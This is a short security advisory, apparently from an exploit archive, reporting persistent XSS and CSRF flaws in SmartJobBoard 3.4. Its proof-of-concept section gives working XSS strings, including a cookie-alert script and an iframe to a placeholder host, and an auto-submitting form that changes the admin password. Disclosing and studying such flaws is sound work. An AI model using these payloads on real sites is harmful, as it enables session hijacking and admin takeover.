Title:
======
SmartJobBoard v3.4 b5140 - Multiple Web Vulnerabilites
Introduction:
=============
SmartJobBoard is an advanced software platform for creating professional job board web sites.
It includes everything
you need for running, customizing and extending your online recruitment service. Whether your job board is niche or general,
employer or job seeker oriented, paid or free SmartJobBoard allows you to implement your ideas easily.
(Copy of the Vendor Homepage: )
Details:
========
1.1
A persistent input validation vulnerabilities are detected in SmartJoBboard ver-3.4 build 5140
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent)
context manipulation. Exploitation requires low user inter action.
Vulnerable Module(s):
[+] Create resume (name of resume, institution, major) are all parameters that are injectible
/add-listing/?listing_type_id=Resume
[+] Sending a message (Title)
/demo/private-messages/send/
[+] Create a screening-questionnaires
/screening-questionnaires/new/
[+] Creating a job
/add-listing/?listing_type_id=Job
1.2
The bugs allow remote attackers to enforce the user (admin) to change his password,add a page, or create a new user (persistent)
Successful exploitation of the vulnerability can lead to creating a new admin account or create a new page.
Vulnerable Module(s):
[+] /admin/adminpswd/
[+] /admin/user-pages/
[+] /admin/users/
Proof of Concept:
=================
1.1
he issue can be exploited by an insert on the Created Object function with script code as value.
The result is the persistent execution out of the web application context.
Strings: >"<<iframe src=http://xxxxx.com/>3</iframe> ... or >"<script>alert(document.cookie)</script><div style="1
2.1
<html>
<form name="test" action="http://www.smartjobboard.com/demo/admin/adminpswd/" method="post">
<input type="hidden" name="action" value="change_admin_account"><br/>
<input type="hidden" name="USR_LOGIN" value="test"><br/>
<input type="hidden" name="new_name" value="admin"><br/>
<input type="hidden" name="old_password" value="admin"><br/>
<input type="hidden" name="new_password" value="admin2"><br/>
<input type="hidden" name ="new_password_confirm" value="admin2"<br/>
</form>
<script>document.test.submit();</script>
</html>
# 0day.today [2018-02-20] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation